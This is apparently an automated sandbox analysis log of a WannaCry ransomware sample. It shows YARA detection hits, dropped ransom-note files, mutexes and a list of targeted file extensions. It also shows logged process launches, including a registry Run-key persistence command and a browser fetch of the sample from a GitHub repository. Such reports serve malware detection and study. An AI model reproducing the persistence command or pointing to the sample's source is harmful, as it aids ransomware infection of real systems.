              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "whprujwpxi808" /t REG_SZ /d "\"C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
              Source: 69.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 11.0.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 11.0.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 11.0.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 0000000B.00000000.1406207775.000000000040E000.00000008.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\r.wnry, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\u.wnry, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\58191711205328.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: WannaCry_RansomNote date = 2017-05-12, hash1 = 4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e, author = Florian Roth, description = Detects WannaCry Ransomware Note, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 0000000B.00000003.1426542169.000000000098A000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 0000000B.00000003.1517789456.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 0000000B.00000003.1423162894.0000000000989000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 0000000B.00000003.1459971296.00000000009A3000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000045.00000000.1517699744.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe1.11.drBinary or memory string: A.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docConnecting to server...s.wnry%08X.eky%08X.res00000000.resrb%08X.dky%08X.pkyConnectedSent requestSucceedReceived responseCongratulations! Your payment has been checked!
              Source: cscript.exe, 00000014.00000002.1425302692.0000000003388000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBP
              Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 0000000B.00000000.1406207775.000000000040E000.00000008.00000001.01000000.00000006.sdmpBinary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
              Source: classification engineClassification label: mal100.rans.troj.spyw.evad.win@8295/1166@26/16
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2784:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeMutant created: \Sessions\1\BaseNamedObjects\MsWinZonesCacheCounterMutexA
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2908:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3484:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeMutant created: \Sessions\1\BaseNamedObjects\Global\MsWinZonesCacheCounterMutexA0
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\b.wnryJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 58191711205328.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
              Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Users\desktop.ini
              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1968,i,18163136596310937086,2943385894762523011,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe "C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
